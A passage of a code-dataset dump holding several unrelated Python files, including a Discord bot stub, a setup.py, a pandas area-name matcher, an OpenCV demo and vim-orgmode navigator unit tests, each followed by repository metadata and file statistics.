@client.command
async def Hello(ctx):
await ctx.send("Hi")
client.run("BOT TOKEN")
| 14 | 42 | 0.654135 | 36 | 266 | 4.777778 | 0.638889 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218045 | 266 | 18 | 43 | 14.777778 | 0.826923 | 0 | 0 | 0 | 0 | 0 | 0.101626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb39289b3f68ac6a3b7e2e131415a89dd368fbbf | 1,121 | py | Python | qoffeeapi/setup.py | foehlija/Qoffee-Maker | efad3af54b466c3ff9867e9105eceb2b3b08f592 | [
"Apache-2.0"
] | null | null | null | qoffeeapi/setup.py | foehlija/Qoffee-Maker | efad3af54b466c3ff9867e9105eceb2b3b08f592 | [
"Apache-2.0"
] | 3 | 2021-11-07T19:14:32.000Z | 2022-03-23T09:40:46.000Z | qoffeeapi/setup.py | foehlija/Qoffee-Maker | efad3af54b466c3ff9867e9105eceb2b3b08f592 | [
"Apache-2.0"
] | 2 | 2021-11-07T17:19:17.000Z | 2021-11-16T14:56:16.000Z | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
from glob import glob
import os
from os.path import join as pjoin
from setuptools import setup, find_packages
HERE = os.path.dirname(os.path.abspath(__file__))
# The name of the project
name = 'qoffeeapi'
# Get the version
version_info = (0, 1, 0, 'dev')
version = ".".join(map(str, version_info))
setup_args = dict(
name = name,
version = version,
scripts = glob(pjoin('scripts', '*')),
packages = find_packages(),
author = 'Max Simon',
author_email = 'max.simon@ibm.com',
platforms = "Linux, Mac OS X, Windows",
include_package_data = True,
python_requires=">=3.6",
install_requires = [
'python-dotenv>=0.19.1'
],
extras_require = {
'test': [
'pytest>=4.6',
'pytest-cov',
'nbval',
]
},
entry_points = {
},
)
if __name__ == '__main__':
setup(**setup_args)
| 21.557692 | 58 | 0.592328 | 136 | 1,121 | 4.661765 | 0.625 | 0.028391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01487 | 0.280107 | 1,121 | 51 | 59 | 21.980392 | 0.770756 | 0.152542 | 0 | 0 | 0 | 0 | 0.143008 | 0.022246 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.147059 | 0 | 0.147059 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb393599c47f4953a5b9b24677e38c55c3bc05b5 | 2,325 | py | Python | db_etl/processors/match_area_names.py | publichealthengland/coronavirus-dashboard-pipeline-etl | efcf5c77091afe8a0f7edce2e5934fe8c1f6dc1c | [
"MIT"
] | 7 | 2021-02-14T12:42:56.000Z | 2022-03-02T09:14:22.000Z | db_etl/processors/match_area_names.py | publichealthengland/coronavirus-dashboard-pipeline-etl | efcf5c77091afe8a0f7edce2e5934fe8c1f6dc1c | [
"MIT"
] | 19 | 2021-11-03T09:21:00.000Z | 2022-03-07T09:26:47.000Z | db_etl/processors/match_area_names.py | publichealthengland/coronavirus-dashboard-pipeline-etl | efcf5c77091afe8a0f7edce2e5934fe8c1f6dc1c | [
"MIT"
] | 2 | 2021-03-03T16:52:51.000Z | 2022-02-28T16:22:33.000Z | #!/usr/bin python3
"""
<Description of the programme>
Author: Pouria Hadjibagheri <pouria.hadjibagheri@phe.gov.uk>
Created: 16 Dec 2020
License: MIT
Contributors: Pouria Hadjibagheri
"""
# Imports
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Python:
from io import StringIO
# 3rd party:
from pandas import DataFrame, read_csv, MultiIndex
# Internal:
try:
from __app__.utilities import get_storage_file
from __app__.utilities import func_logger
except ImportError:
from utilities import get_storage_file
from utilities import func_logger
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Header
__author__ = "Pouria Hadjibagheri"
__copyright__ = "Copyright (c) 2020, Public Health England"
__license__ = "MIT"
__version__ = "0.0.1"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__all__ = [
'match_area_names'
]
AREA_TYPE_NAMES = {
'nations': 'nation',
'nhsTrusts': 'nhsTrust',
'utlas': 'utla',
'ltlas': 'ltla',
'nhsRegions': 'nhsRegion',
'regions': 'region',
'uk': 'overview'
}
@func_logger("match area names")
def match_area_names(d: DataFrame, area_type_repls):
ref_names_io = StringIO(get_storage_file("pipeline", "assets/geoglist.csv"))
ref_names = read_csv(ref_names_io, usecols=["areaType", "areaCode", "areaName"])
ref_names.replace(area_type_repls, inplace=True)
ref_names = ref_names.loc[ref_names.areaCode.isin(d.areaCode), :]
ref_names.set_index(["areaType", "areaCode"], inplace=True)
# print(ref_names.areaType)
d = d.drop(columns=['areaType', 'areaName'])
print("post", d.shape)
result = (
d
# .drop(columns=['areaName'])
.join(ref_names, on=["areaType", "areaCode"], how="left")
)
return result
if __name__ == "__main__":
df = read_csv(
"/Users/pouria/Documents/Projects/coronavirus-data-etl/db_etl/test/v2/archive/processed_20201216-1545.csv",
usecols=["areaCode", "areaType", "date", "areaName", "newCasesBySpecimenDate"],
low_memory=False
).replace(AREA_TYPE_NAMES)
print(df.shape)
df = match_area_names(df, AREA_TYPE_NAMES)
print(df.shape)
print(df.tail(10).to_string())
| 28.353659 | 115 | 0.60172 | 252 | 2,325 | 5.230159 | 0.5 | 0.060698 | 0.042489 | 0.033384 | 0.088012 | 0.088012 | 0 | 0 | 0 | 0 | 0 | 0.0154 | 0.162151 | 2,325 | 81 | 116 | 28.703704 | 0.661191 | 0.242581 | 0 | 0.041667 | 0 | 0.020833 | 0.263339 | 0.072289 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020833 | false | 0 | 0.145833 | 0 | 0.1875 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb39acda6eb9959537beae46dae372efee98d23a | 478 | py | Python | Source/RemovePunctuation.py | jj-style/Cryptobreaker | c99b9cc35114e55c87b073ee2467c06bd95835a5 | [
"MIT"
] | null | null | null | Source/RemovePunctuation.py | jj-style/Cryptobreaker | c99b9cc35114e55c87b073ee2467c06bd95835a5 | [
"MIT"
] | null | null | null | Source/RemovePunctuation.py | jj-style/Cryptobreaker | c99b9cc35114e55c87b073ee2467c06bd95835a5 | [
"MIT"
] | null | null | null | import string
punctuation = string.punctuation + "’" + '“' + "‘" + "—"
def RemovePunctuation(text,remove_spaces=True,to_lower=True):
text = list(text)
while "\n" in text:
text.remove("\n")
text = "".join(text)
if remove_spaces:
text = text.replace(" ","")
if to_lower:
text=text.lower()
for letter in text:
if letter in punctuation:
text = text.replace(letter,"")
text = text.strip("\n")
return text
| 25.157895 | 61 | 0.573222 | 58 | 478 | 4.672414 | 0.396552 | 0.147601 | 0.110701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.269874 | 478 | 18 | 62 | 26.555556 | 0.773639 | 0 | 0 | 0 | 0 | 0 | 0.023013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb39bd1cb1f7b1f9160cbb2212804ba07a9c2e7f | 868 | py | Python | src/BeanPorter/bpcml/Decls.py | WeZZard/BeanPorter | 51a501c17aa7c14763bfe2bb361819f81119dfd1 | [
"MIT"
] | null | null | null | src/BeanPorter/bpcml/Decls.py | WeZZard/BeanPorter | 51a501c17aa7c14763bfe2bb361819f81119dfd1 | [
"MIT"
] | null | null | null | src/BeanPorter/bpcml/Decls.py | WeZZard/BeanPorter | 51a501c17aa7c14763bfe2bb361819f81119dfd1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from abc import abstractmethod
from typing import Dict, Optional
from BeanPorter.bpcml.Exprs import Expr
class Decl(object):
def __init__(self):
pass
@abstractmethod
def evaluate(self, variables: Dict[str, str]) -> str:
pass
class RuleDecl(Decl):
def __init__(self, expr: Optional[Expr] = None):
self.expr = expr
super().__init__()
def __str__(self) -> str:
return self.expr.__str__()
def __repr__(self) -> str:
return self.expr.__repr__()
@abstractmethod
def evaluate(self, variables: Dict[str, str]) -> str:
if self.expr is None:
return ""
return self.expr.evaluate(variables)
@staticmethod
def make_empty() -> 'RuleDecl':
return RuleDecl()
@staticmethod
def make(expr: Expr) -> 'RuleDecl':
assert(expr is not None)
return RuleDecl(expr)
| 19.727273 | 55 | 0.658986 | 108 | 868 | 5.027778 | 0.342593 | 0.088398 | 0.077348 | 0.106814 | 0.265193 | 0.187845 | 0.187845 | 0.187845 | 0.187845 | 0 | 0 | 0.001481 | 0.22235 | 868 | 43 | 56 | 20.186047 | 0.802963 | 0.024194 | 0 | 0.275862 | 0 | 0 | 0.018913 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.275862 | false | 0.068966 | 0.103448 | 0.103448 | 0.655172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 3 |
bb3a099bb9a7dda933d3ae72762ca266279413d3 | 877 | py | Python | tests/test_region.py | TorbenFricke/cmtoolkit | f1bf1ec191fd9b20e6edcd3385c8b9fee1d638ca | [
"BSD-3-Clause"
] | 12 | 2015-07-07T03:36:43.000Z | 2022-03-14T20:21:24.000Z | tests/test_region.py | TorbenFricke/cmtoolkit | f1bf1ec191fd9b20e6edcd3385c8b9fee1d638ca | [
"BSD-3-Clause"
] | 11 | 2015-05-11T08:02:42.000Z | 2020-05-21T16:13:45.000Z | tests/test_region.py | TorbenFricke/cmtoolkit | f1bf1ec191fd9b20e6edcd3385c8b9fee1d638ca | [
"BSD-3-Clause"
] | 1 | 2017-11-07T15:14:10.000Z | 2017-11-07T15:14:10.000Z | import unittest
from conformalmapping import *
class TestRegion(unittest.TestCase):
def setUp(self):
self.regions = [
Disk(Circle(0.0, 1.0))
]
self.p = Circle(0.0, 1.0)
def test_str_present(self):
for r in self.regions:
str(r)
def test_repr_present(self):
for r in self.regions:
repr(r)
def test_empty_constructors(self):
r = Region()
def test_onearg_constructors(self):
r = Region(outer = self.p)
def test_list_constructors(self):
r = Region(outer = [self.p, self.p])
def test_bad_constructor(self):
with self.assertRaises(Exception):
r = Region(outer = [42])
def test_interior_constructor(self):
r = Region.interiorto(self.p)
def test_exterior_constructor(self):
r = Region.exteriorto(self.p)
| 23.078947 | 44 | 0.600912 | 113 | 877 | 4.522124 | 0.345133 | 0.109589 | 0.107632 | 0.135029 | 0.277887 | 0.238748 | 0.238748 | 0 | 0 | 0 | 0 | 0.016077 | 0.290764 | 877 | 37 | 45 | 23.702703 | 0.805466 | 0 | 0 | 0.074074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 1 | 0.333333 | false | 0 | 0.074074 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb3a778fd080a8f387a45d5d5f462f403e83a6b3 | 399 | py | Python | month06/Machine_learning/day08/demo/02_img_read_save.py | chaofan-zheng/python_learning_code | 5d05848911d55aa49eaee4afd7ffd80536fad7aa | [
"Apache-2.0"
] | null | null | null | month06/Machine_learning/day08/demo/02_img_read_save.py | chaofan-zheng/python_learning_code | 5d05848911d55aa49eaee4afd7ffd80536fad7aa | [
"Apache-2.0"
] | null | null | null | month06/Machine_learning/day08/demo/02_img_read_save.py | chaofan-zheng/python_learning_code | 5d05848911d55aa49eaee4afd7ffd80536fad7aa | [
"Apache-2.0"
] | null | null | null | # 01_img_read_save.py
# 图像读取, 显示, 保存
import cv2
im = cv2.imread("../test_img/Linus.png", # 图像路径
1) # 1-彩色图像 0-灰度图像
print(type(im)) # 打印类型: ndarray
print(im.shape) # 打印图像形状
# 显示
cv2.imshow("im", # 窗体名称(如果重复,后面会覆盖前面)
im) # 图像数据, imread的返回值
# 保存
cv2.imwrite("Linus_new.png", # 保存的图片路径
im)# 图像数据
cv2.waitKey() # 等待用户敲击按键(阻塞函数)
cv2.destroyAllWindows() # 销毁所有创建的窗体 | 23.470588 | 47 | 0.62406 | 58 | 399 | 4.206897 | 0.689655 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035144 | 0.215539 | 399 | 17 | 48 | 23.470588 | 0.744409 | 0.380952 | 0 | 0.181818 | 0 | 0 | 0.154506 | 0.090129 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb3bccac3c361186a4bcf66d697926d46ae834d7 | 20,129 | py | Python | vim/plugins/vim-orgmode/tests/test_plugin_navigator.py | Raymond-yn/dotfiles | b1745ff62f4285785877a2c04d93ce8fa2775964 | [
"MIT"
] | 11 | 2018-11-16T02:30:33.000Z | 2018-11-27T14:57:55.000Z | vim/plugins/vim-orgmode/tests/test_plugin_navigator.py | Raymond-yn/dotfiles | b1745ff62f4285785877a2c04d93ce8fa2775964 | [
"MIT"
] | null | null | null | vim/plugins/vim-orgmode/tests/test_plugin_navigator.py | Raymond-yn/dotfiles | b1745ff62f4285785877a2c04d93ce8fa2775964 | [
"MIT"
] | 1 | 2019-01-22T06:51:51.000Z | 2019-01-22T06:51:51.000Z | # -*- coding: utf-8 -*-
import unittest
import sys
sys.path.append(u'../ftplugin')
import vim
from orgmode._vim import ORGMODE
from orgmode.py3compat.encode_compatibility import *
START = True
END = False
def set_visual_selection(visualmode, line_start, line_end, col_start=1,
col_end=1, cursor_pos=START):
if visualmode not in (u'', u'V', u'v'):
raise ValueError(u'Illegal value for visualmode, must be in , V, v')
vim.EVALRESULTS['visualmode()'] = visualmode
# getpos results [bufnum, lnum, col, off]
vim.EVALRESULTS['getpos("\'<")'] = ('', '%d' % line_start, '%d' %
col_start, '')
vim.EVALRESULTS['getpos("\'>")'] = ('', '%d' % line_end, '%d' %
col_end, '')
if cursor_pos == START:
vim.current.window.cursor = (line_start, col_start)
else:
vim.current.window.cursor = (line_end, col_end)
counter = 0
class NavigatorTestCase(unittest.TestCase):
def setUp(self):
global counter
counter += 1
vim.CMDHISTORY = []
vim.CMDRESULTS = {}
vim.EVALHISTORY = []
vim.EVALRESULTS = {
# no org_todo_keywords for b
u_encode(u'exists("b:org_todo_keywords")'): u_encode('0'),
# global values for org_todo_keywords
u_encode(u'exists("g:org_todo_keywords")'): u_encode('1'),
u_encode(u'g:org_todo_keywords'): [u_encode(u'TODO'), u_encode(u'|'), u_encode(u'DONE')],
u_encode(u'exists("g:org_debug")'): u_encode(u'0'),
u_encode(u'exists("g:org_debug")'): u_encode(u'0'),
u_encode(u'exists("*repeat#set()")'): u_encode(u'0'),
u_encode(u'b:changedtick'): u_encode(u'%d' % counter),
u_encode(u"v:count"): u_encode(u'0'),
}
vim.current.buffer[:] = [ u_encode(i) for i in u"""
* Überschrift 1
Text 1
Bla bla
** Überschrift 1.1
Text 2
Bla Bla bla
** Überschrift 1.2
Text 3
**** Überschrift 1.2.1.falsch
Bla Bla bla bla
*** Überschrift 1.2.1
* Überschrift 2
* Überschrift 3
asdf sdf
""".split(u'\n') ]
if not u'Navigator' in ORGMODE.plugins:
ORGMODE.register_plugin(u'Navigator')
self.navigator = ORGMODE.plugins[u'Navigator']
def test_movement(self):
# test movement outside any heading
vim.current.window.cursor = (1, 0)
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (1, 0))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
def test_forward_movement(self):
# test forward movement
vim.current.window.cursor = (2, 0)
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (13, 5))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (17, 2))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
## don't move cursor if last heading is already focussed
vim.current.window.cursor = (19, 6)
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (19, 6))
## test movement with count
vim.current.window.cursor = (2, 0)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'-1')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
vim.current.window.cursor = (2, 0)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
vim.current.window.cursor = (2, 0)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'1')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'3')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
def test_backward_movement(self):
# test backward movement
vim.current.window.cursor = (19, 6)
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (17, 2))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (13, 5))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
## test movement with count
vim.current.window.cursor = (19, 6)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'-1')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
vim.current.window.cursor = (19, 6)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
vim.current.window.cursor = (19, 6)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'3')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'4')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'4')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
def test_parent_movement(self):
# test movement to parent
vim.current.window.cursor = (2, 0)
self.assertEqual(self.navigator.parent(mode=u'normal'), None)
self.assertEqual(vim.current.window.cursor, (2, 0))
vim.current.window.cursor = (3, 4)
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (3, 4))
vim.current.window.cursor = (16, 4)
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
vim.current.window.cursor = (15, 6)
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
## test movement with count
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'-1')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'1')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'2')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'3')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
def test_next_parent_movement(self):
# test movement to parent
vim.current.window.cursor = (6, 0)
self.assertNotEqual(self.navigator.parent_next_sibling(mode=u'normal'), None)
self.assertEqual(vim.current.window.cursor, (17, 2))
def test_forward_movement_visual(self):
# selection start: <<
# selection end: >>
# cursor poistion: |
# << text
# text| >>
# text
# heading
set_visual_selection(u'V', 2, 4, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5gg'))
# << text
# text
# text| >>
# heading
set_visual_selection(u'V', 2, 5, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV9gg'))
# << text
# x. heading
# text| >>
# heading
set_visual_selection(u'V', 12, 14, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV15gg'))
set_visual_selection(u'V', 12, 15, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV16gg'))
set_visual_selection(u'V', 12, 16, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV17gg'))
# << text
# text
# text| >>
# heading
# EOF
set_visual_selection(u'V', 15, 17, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV20gg'))
# << text >>
# heading
set_visual_selection(u'V', 1, 1, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 1ggV5gg'))
# << heading >>
# text
# heading
set_visual_selection(u'V', 2, 2, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5gg'))
# << text >>
# heading
set_visual_selection(u'V', 1, 1, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 1ggV5gg'))
# << |text
# heading
# text
# heading
# text >>
set_visual_selection(u'V', 1, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# << |heading
# text
# heading
# text >>
set_visual_selection(u'V', 2, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 6ggV8ggo'))
# << |heading
# text >>
# heading
set_visual_selection(u'V', 6, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 8ggV9gg'))
# << |x. heading
# text >>
# heading
set_visual_selection(u'V', 13, 15, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV15gg'))
set_visual_selection(u'V', 13, 16, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 16ggV16ggo'))
set_visual_selection(u'V', 16, 16, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 16ggV17gg'))
# << |x. heading
# text >>
# heading
# EOF
set_visual_selection(u'V', 17, 17, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 17ggV20gg'))
# << |heading
# text>>
# text
# EOF
set_visual_selection(u'V', 18, 19, cursor_pos=START)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 19ggV20gg'))
# << heading
# text|>>
# text
# EOF
set_visual_selection(u'V', 18, 19, cursor_pos=END)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 18ggV20gg'))
# << heading
# text|>>
# EOF
set_visual_selection(u'V', 18, 20, cursor_pos=END)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 18ggV20gg'))
# << |heading
# text>>
# EOF
set_visual_selection(u'V', 20, 20, cursor_pos=START)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 20ggV20gg'))
def test_forward_movement_visual_to_the_end_of_the_file(self):
vim.current.buffer[:] = [ u_encode(i) for i in u"""
* Überschrift 1
Text 1
Bla bla
** Überschrift 1.1
Text 2
Bla Bla bla
** Überschrift 1.2
Text 3
**** Überschrift 1.2.1.falsch
Bla Bla bla bla
test
""".split(u'\n') ]
# << |heading
# text>>
# EOF
set_visual_selection(u'V', 15, 15, cursor_pos=START)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV17gg'))
set_visual_selection(u'V', 15, 17, cursor_pos=END)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV17gg'))
def test_backward_movement_visual(self):
# selection start: <<
# selection end: >>
# cursor poistion: |
# << text | >>
# text
# heading
set_visual_selection(u'V', 1, 1, cursor_pos=START)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! gv'))
set_visual_selection(u'V', 1, 1, cursor_pos=END)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! gv'))
# << heading| >>
# text
# heading
set_visual_selection(u'V', 2, 2, cursor_pos=START)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV2ggo'))
set_visual_selection(u'V', 2, 2, cursor_pos=END)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV2ggo'))
# heading
# text
# << |text
# text >>
set_visual_selection(u'V', 3, 5, cursor_pos=START)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5ggo'))
# heading
# text
# << text
# text| >>
